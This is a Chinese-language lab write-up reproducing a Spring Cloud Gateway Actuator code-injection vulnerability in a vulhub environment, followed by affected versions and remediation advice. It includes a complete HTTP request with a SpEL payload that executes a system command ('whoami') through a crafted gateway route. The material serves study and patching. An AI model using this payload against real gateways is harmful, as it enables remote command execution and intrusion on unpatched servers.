一、漏洞描述
Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。据公布的漏洞描述称,当Spring Cloud Gateway 执行器端点启用、公开且不安全时,使用Spring Cloud Gateway的应用程序容易受到代码注入攻击。远程攻击者可以发出含有恶意代码的请求,从而允许在远程主机上任意远程执行。
二、漏洞复现
1、打开虚拟机,利用vulhub启动漏洞环境,使用sudo docker-compose up -d 命令,并使用ifconfig查看当前ip:
2、访问漏洞环境(ip:8080),出现如图页面:
3、使用burp抓包(此时端口可能被占用,需要在burp中重新设置端口)
在浏览器代理插件重新设置shez端口:
4、抓包如下:原始数据包
5、右键Change request method(改变请求头方式),改为post请求方式,(目的:post是向服务器传送数据)
6、使用以下恶意路由:
POST /actuator/gateway/routes/EchoSec HTTP/1.1
Host: 192.168.42.145:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 334
{
"id": "EchoSec",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value":"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
}
}],
"uri": "Example Domain"
}
右键send to repeater,直接send,响应创建成功。
刷新路由:/actuator/gateway/refresh
执行命令:
3.影响范围
受影响版本
Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
Spring Cloud Gateway 旧的、不受支持的版本也会受到影响
安全版本
Spring Cloud Gateway >= 3.1.1
Spring Cloud Gateway >= 3.0.7
4.修复建议
目前, Spring Cloud 官方已发布安全更新,请及时下载安全版本进行升级和采取以下措施进行防护:
如果不需要Actuator端点,可以通过management.endpoint.gateway.enable:false配置将其禁用;
如果需要Actuator端点,则应使用Spring Security对其进行保护。